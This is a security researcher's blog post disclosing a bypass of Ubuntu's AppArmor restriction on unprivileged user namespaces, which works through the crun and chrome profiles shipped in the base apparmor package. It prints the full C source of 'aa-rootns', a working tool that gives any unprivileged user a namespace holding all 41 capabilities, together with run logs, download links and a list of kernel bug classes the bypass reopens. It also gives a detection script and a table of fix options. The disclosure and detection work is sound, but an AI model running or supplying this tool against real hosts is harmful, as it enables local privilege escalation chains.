aa-rootns: Ubuntu's userns mitigation is bypassed by Ubuntu

2026-05-05 · linuxapparmorkernelusernsubuntu

i keep running kernel exploits that need a userns, and on Ubuntu the answer in every CVE writeup is the same footnote: "but apparmor_restrict_unprivileged_userns=1 blocks reach on modern Ubuntu." so i went looking at what that sysctl actually does on a fresh install, and the mitigation is bypassed by profiles Ubuntu itself ships in the base apparmor package.

Ubuntu shipped kernel.apparmor_restrict_unprivileged_userns=1 in 24.04 and kept it in 26.04 (Resolute). it's their answer to the unprivileged-user-namespace LPE class that has been around for years. that's the family of bugs (most famously CVE-2024-1086) where you drop into a fresh user namespace, pick up CAP_SYS_ADMIN for free against that namespace, and use it to reach a kernel surface (nft, tipc, sunrpc, vxlan, ...) that used to need real root.

two AppArmor profiles in that same base package defeat it: chrome and crun. they're present, kernel-loaded, and reachable on every default install. aa-rootns is a single C file that automates the bypass and drops any unprivileged user into a userns with the full 41-cap bitmap.

what the mitigation actually does

on Ubuntu 24.04+, with kernel.apparmor_restrict_unprivileged_userns=1 (the default), the kernel-side AppArmor LSM intercepts unshare(CLONE_NEWUSER) and clone(CLONE_NEWUSER) from unconfined processes and forces the new task into the unprivileged_userns profile. that profile lives at /etc/apparmor.d/unprivileged_userns and reads roughly like:

profile unprivileged_userns flags=(unconfined) {
  userns,
  audit deny capability,
  ...
}

audit deny capability, is the load-bearing line. every capability check from inside that profile fails, no matter what the userns itself would have granted. so the standard userns-LPE shape - unshare(NEWUSER), setuid(0), unshare(NEWNET), then drive a buggy ns_capable(CAP_NET_ADMIN) path - folds at step three, because the NET_ADMIN check now runs through AppArmor and gets rejected.

this is the change every distro hardening tracker and every "is Ubuntu vulnerable to X" thread on the kernel-hardening list has been quoting since 2024. it really does block the naive form. that's what made me want to see whether anything on a stock install still walks around it.

the bypass

AppArmor profiles can carry flags=(unconfined). a process running under a flags=(unconfined) profile is "named but otherwise just like unconfined" - the mediator is told to be a no-op for it. and when that task creates a user namespace, the LSM does not rewrite its profile to unprivileged_userns. it stays in the named-unconfined profile, and no caps get stripped.

two such profiles ship in the base apparmor package on Ubuntu 24.04+:

# /etc/apparmor.d/crun
profile crun /usr/bin/crun flags=(unconfined) {
  userns,
  @{exec_path} mr,
  include if exists <local/crun>
}

# /etc/apparmor.d/chrome
profile chrome /opt/google/chrome/chrome flags=(unconfined) {
  userns,
  @{exec_path} mr,
  include if exists <local/chrome>
}

both grant the userns, rule (which AppArmor requires for userns creation when restrict mode is on) and both are flags=(unconfined) (which means no cap strip on transition).

you don't need the actual binaries installed to reach them. any unprivileged process can self-transition into a loaded profile by writing "exec <name>" into /proc/self/attr/exec and then calling execv. the kernel resolves the profile by name. the path attached to the profile (/usr/bin/crun, /opt/google/chrome/chrome) is only there for AppArmor's policy engine to path-match against, it isn't a precondition.

how much of the fleet has this

both profiles are owned by the apparmor package, which is Priority: standard. that gets pulled in by every Ubuntu 24.04+ system task and lands on Server, Desktop, Cloud, and minimal images. i verified on two independent Ubuntu 26.04 LTS (Resolute) installs:

$ dpkg -S /etc/apparmor.d/crun /etc/apparmor.d/chrome
apparmor: /etc/apparmor.d/crun
apparmor: /etc/apparmor.d/chrome

$ apt-cache show apparmor | grep -E '^(Package|Priority|Section)'
Package: apparmor
Priority: standard
Section: admin

$ sudo cat /sys/kernel/security/apparmor/profiles | grep -E '^(crun|chrome|unprivileged_userns) '
unprivileged_userns (enforce)
crun (unconfined)
chrome (unconfined)

and they're not the only candidates. a grep for flags=(unconfined)-with-userns-rule profiles on a default desktop install gives you a long tail:

1password, brave, buildah, ch-checkns, ch-run, chrome, chromium, code,
crun, devhelp, Discord, element-desktop, epiphany, evolution, firefox,
flatpak, foliate, geary, github-desktop, goldendict, kchmviewer,
keybase, lc-compliance, libcamerify, linux-sandbox, loupe, lxc-attach,
lxc-usernsexec, MongoDB_Compass, ...

even on Ubuntu Server with no desktop apps installed, crun alone is enough, and its profile ships with apparmor whether or not the crun package is ever pulled in.

the toolkit: aa-rootns

aa-rootns is a single C file that automates the bypass. it self-stages through crun → chrome via re-exec, creates a userns under the second profile (so no cap strip), writes uid/gid maps, launders Permitted → Inheritable → Ambient so the caps survive execv, and drops you into /bin/bash (or a target you supply) inside that userns.

receipt: from a clean unprivileged user

run as user np. uid 1001, single group np, no sudo, no plugdev, no kvm, no docker, nothing. on Ubuntu 26.04 LTS (kernel 7.0.0-15-generic, no KASAN, production-equivalent build):

np@host:~$ id
uid=1001(np) gid=1001(np) groups=1001(np)

np@host:~$ ./aa-rootns -p
[s0] aa=unconfined uid=1001 euid=1001
[s1] aa=crun//&unconfined (unconfined) uid=1001 euid=1001
[s2-entry] aa=chrome (unconfined) uid=1001 euid=1001
[s2-postuser] aa=chrome (unconfined) uid=0 euid=0
[s2-postuser] capE=000001ff_ffffffff  capP=000001ff_ffffffff
[s2] 41 caps raised into Ambient
=== aa-rootns proof ===
uid=0 euid=0 gid=0 egid=0
cap_effective=0x000001ffffffffff
cap_permitted=0x000001ffffffffff
caps held:
    CAP_chown
    CAP_dac_override
    CAP_dac_read_search
    CAP_fowner
    CAP_fsetid
    CAP_kill
    CAP_setgid
    CAP_setuid
    CAP_setpcap
    CAP_linux_immutable
    CAP_net_bind_service
    CAP_net_broadcast
    CAP_net_admin
    CAP_net_raw
    CAP_ipc_lock
    CAP_ipc_owner
    CAP_sys_module
    CAP_sys_rawio
    CAP_sys_chroot
    CAP_sys_ptrace
    CAP_sys_pacct
    CAP_sys_admin
    CAP_sys_boot
    CAP_sys_nice
    CAP_sys_resource
    CAP_sys_time
    CAP_sys_tty_config
    CAP_mknod
    CAP_lease
    CAP_audit_write
    CAP_audit_control
    CAP_setfcap
    CAP_mac_override
    CAP_mac_admin
    CAP_syslog
    CAP_wake_alarm
    CAP_block_suspend
    CAP_audit_read
    CAP_perfmon
    CAP_bpf
    CAP_checkpoint_restore
ns-cap probes:
    unshare(NEWNET)  ok (CAP_SYS_ADMIN inside userns)
    unshare(NEWUTS)  ok
    unshare(NEWNS)   ok
    unshare(NEWPID)  ok
    unshare(NEWIPC)  ok

and as a runner for arbitrary commands:

np@host:~$ ./aa-rootns -- id
uid=0(root) gid=0(root) groups=0(root)

np@host:~$ ./aa-rootns -- cat /proc/self/status | grep ^Cap
CapInh: 000001ffffffffff
CapPrm: 000001ffffffffff
CapEff: 000001ffffffffff
CapBnd: 000001ffffffffff
CapAmb: 000001ffffffffff

np@host:~$ ./aa-rootns -n -- ip link add dummy0 type dummy
np@host:~$ ./aa-rootns -n -- bash -c 'ip link | head -3'
1: lo: <LOOPBACK> mtu 65536 ...

the transition is fully audited. AppArmor logs each change_onexec, but it logs an AUDIT event, not DENIED, because nothing forbids the operation. from journalctl -k:

apparmor="AUDIT" operation="change_onexec" class="file"
info="change_profile unprivileged unconfined converted to stacking"
profile="unconfined" name="crun" pid=NNNN comm="aa-rootns"

what this is and isn't

what it is: a clean defeat of the apparmor_restrict_unprivileged_userns mitigation, as shipped by default, on the userland Ubuntu has actually been distributing for two years. once aa-rootns drops you into the userns, every CVE writeup that ends with "but the unprivileged_userns profile blocks reach on Ubuntu" is back in play. that's the whole point of the post.

the classes of bugs the hardening community has been writing off as not-Ubuntu-exploitable include:

ns_capable(CAP_NET_ADMIN) bugs across the nft / tc / vxlan / fib / ... netlink surfaces;
ns_capable(CAP_BPF) bugs in BPF helpers when kernel.unprivileged_bpf_disabled is set to use the BPF cap;
ns_capable(CAP_SYS_ADMIN) bugs in sunrpc, tipc, vsock, keyring management, and any per-netns proc file whose make_kuid path wants a populated uid_map;
RCU/refcount/UAF races gated on "you must be inside a userns you own". most distros killed those by setting unprivileged_userns_clone=0, but Ubuntu left unprivileged_userns_clone enabled and gated it through this AppArmor profile instead.

what it isn't: a kernel CVE. aa-rootns on its own gives you "root" only inside a userns you own, not on the host. capabilities checked against init_user_ns (loadable kernel modules, FS_USERNS_MOUNT-less filesystem mounts, raw IO, ptrace of host processes, init-owned DAC bits) all still fail. what it buys you is that aa-rootns reopens the door to kernel bugs that need a namespace-scoped capability, and from there a separate kernel exploit takes you to host-root. it's the bouncer pass, not the throne.

if your threat model is "no unprivileged user namespace creation, ever," set kernel.unprivileged_userns_clone=0. that sysctl, the older one, actually does what people hoped apparmor_restrict_unprivileged_userns would do. the catch is it breaks every container runtime, browser sandbox, and bubblewrap-using application, which is why distros stopped shipping it as 0 by default and built the AppArmor-based version. and the AppArmor-based version is the one with the structural problem this post is about.

why this is hard to fix

every natural fix breaks something:

fix	what it breaks
Strip `userns,` rule from `crun` / `chrome` profiles	chrome's sandbox, crun's containers, podman rootless, every browser tab. both binaries need userns to function.
Force `unprivileged_userns` profile to also attach when transitioning out of `flags=(unconfined)` parents	invasive AppArmor semantic change. "unconfined" stops meaning unconfined, and it likely breaks any existing profile relying on transition rules through unconfined parents.
Add a separate sysctl: forbid `change_profile` from unconfined to any `flags=(unconfined)` profile that grants `userns`	less invasive, a new gate. the real fix candidate, but it needs new kernel plumbing and per-profile review.
Audit every shipped profile to ensure none with `userns,` + `flags=(unconfined)` is reachable from unconfined	fixes it today, but leaves a recurrence vector for any future package that adds a similar profile.

the third option is what an actual fix probably looks like. the recurrence problem in the fourth row is the real story though, AppArmor's profile composition model has no rule against this combination, so any third-party .deb can ship a fresh bypass profile and nobody would notice.

detection

to enumerate the bypass-eligible profiles on a host:

for f in /etc/apparmor.d/* /etc/apparmor.d/*.d/*; do
    [ -f "$f" ] || continue
    grep -q 'flags=(unconfined)' "$f" 2>/dev/null || continue
    grep -Eq '^[[:space:]]*userns[[:space:]]*,' "$f" 2>/dev/null && echo "$f"
done

cross-check against /sys/kernel/security/apparmor/profiles to keep only the ones actually loaded into the kernel (some profiles ship disabled).

to catch the bypass at runtime, subscribe to the audit log and watch for operation="change_onexec" ... profile="unconfined" name="crun" (or chrome, etc.) chained into operation="userns_create" within the same task tree. it's most suspicious when the eventual exec target is a non-browser, non-container-runtime binary.

the toolkit, source

/*
 * aa-rootns. defeat Ubuntu apparmor_restrict_unprivileged_userns
 *
 *   stage 0: change_onexec(crun);   execv self. enter unconfined profile
 *   stage 1: change_onexec(chrome); execv self. double-hop, optional
 *   stage 2: unshare(CLONE_NEWUSER); write uid_map / gid_map; capset I=P;
 *            raise all caps into Ambient; execvp target.
 *
 * Build:  gcc -O2 -Wall -o aa-rootns aa-rootns.c
 * Use:    ./aa-rootns -p           # proof of caps
 *         ./aa-rootns -- id        # run command in the userns
 *         ./aa-rootns -n -- cmd    # also unshare(NEWNET) before exec
 *
 * No funny business. Standard libc, no eBPF, no JIT, no kernel module.
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sched.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <linux/capability.h>

static int change_onexec(const char *p) {
    int fd = open("/proc/self/attr/exec", O_WRONLY);
    if (fd < 0) return -1;
    char b[256]; int n = snprintf(b, sizeof b, "exec %s", p);
    ssize_t r = write(fd, b, n); int e = errno;
    close(fd); errno = e; return r == n ? 0 : -1;
}
static void wfile(const char *p, const char *c) {
    int fd = open(p, O_WRONLY); if (fd < 0) return;
    (void)!write(fd, c, strlen(c)); close(fd);
}

#define TAG "AA-ROOTNS-STAGE-"

static int stage1(int ac, char **av) {
    if (change_onexec("chrome") < 0) return perror("chrome"), 1;
    av[1] = (char *)TAG "2"; execv("/proc/self/exe", av);
    return perror("execv s2"), 1;
}
static int stage2(int ac, char **av) {
    uid_t u = getuid(); gid_t g = getgid();
    if (unshare(CLONE_NEWUSER) < 0) return perror("unshare(USER)"), 1;
    wfile("/proc/self/setgroups", "deny");
    char m[64];
    snprintf(m, sizeof m, "0 %u 1", u); wfile("/proc/self/uid_map", m);
    snprintf(m, sizeof m, "0 %u 1", g); wfile("/proc/self/gid_map", m);
    (void)!setresuid(0, 0, 0); (void)!setresgid(0, 0, 0);

    struct __user_cap_header_struct h = { _LINUX_CAPABILITY_VERSION_3, 0 };
    struct __user_cap_data_struct d[2] = {0};
    syscall(SYS_capget, &h, d);
    d[0].inheritable = d[0].permitted;
    d[1].inheritable = d[1].permitted;
    syscall(SYS_capset, &h, d);
    for (int c = 0; c < 64; c++)
        prctl(PR_CAP_AMBIENT, PR_CAP_AMBIENT_RAISE, c, 0, 0);

    int sep = -1;
    for (int i = 2; i < ac; i++) if (!strcmp(av[i], "--")) { sep = i; break; }
    char *def[] = { (char *)"/bin/bash", NULL };
    char **t = (sep > 0 && sep + 1 < ac) ? &av[sep + 1] : def;
    execvp(t[0], t); return perror("execvp"), 1;
}
int main(int ac, char **av) {
    if (ac >= 2 && !strcmp(av[1], TAG "1")) return stage1(ac, av);
    if (ac >= 2 && !strcmp(av[1], TAG "2")) return stage2(ac, av);
    if (change_onexec("crun") < 0) { perror("crun"); return 1; }
    char **a = calloc(ac + 2, sizeof *a);
    a[0] = av[0]; a[1] = (char *)TAG "1";
    for (int i = 1; i < ac; i++) a[i + 1] = av[i];
    execv("/proc/self/exe", a);
    return perror("execv s1"), 1;
}

the full version with a -p proof flag, capability decoding, namespace-cap probes, an interactive shell mode, and verbose stage tracing is a short hop from this. that's what the receipts above came from.

downloads

aa-rootns.c: full source. gcc -O2 -Wall -o aa-rootns aa-rootns.c.
bypass-pwn.c: the underlying double-hop bypass research. aa-rootns is that, packaged as a tool.

SHA-256:

3eff371b47f73a48812c3264cdc9b552beaaf0cbd9afacb29045dc4edafba698  aa-rootns.c
821cedccb1bec8226cc0a56232407c64dcf41c4da61d94def559b180cc717ab1  bypass-pwn.c

acknowledgements and prior art

the flags=(unconfined)-with-userns shape has come up in passing on the apparmor and ubuntu-hardening lists since the restrict-unprivileged-userns sysctl landed. what's new here is the explicit demonstration on a default install with a working tool, the footprint walk-through (chrome/crun are not optional packages, they ship with apparmor), and the inventory of how many other profiles in the wild carry the same combination.

if you've published a writeup on this and want a citation, mail in. if you work on AppArmor at Canonical and want to talk fix shape, also mail in.

reproduction notes

tested on Ubuntu 26.04 LTS (Resolute), kernels 7.0.0-15-generic (production) and 7.1.0-rc1-kasan-sickfuzz+ (lab fuzzing). same behavior on both.
both chrome and crun profiles are present and loaded on a fresh install. verified via cat /sys/kernel/security/apparmor/profiles.
the unprivileged user in the receipts (np, uid 1001) sits in only its own primary group. no sudo, no plugdev, no kvm, no docker, no lxd.
aa-rootns is a single static-ish C file, nothing beyond libc. compile with gcc -O2 -o aa-rootns aa-rootns.c.

. _SiCk · afflicted.sh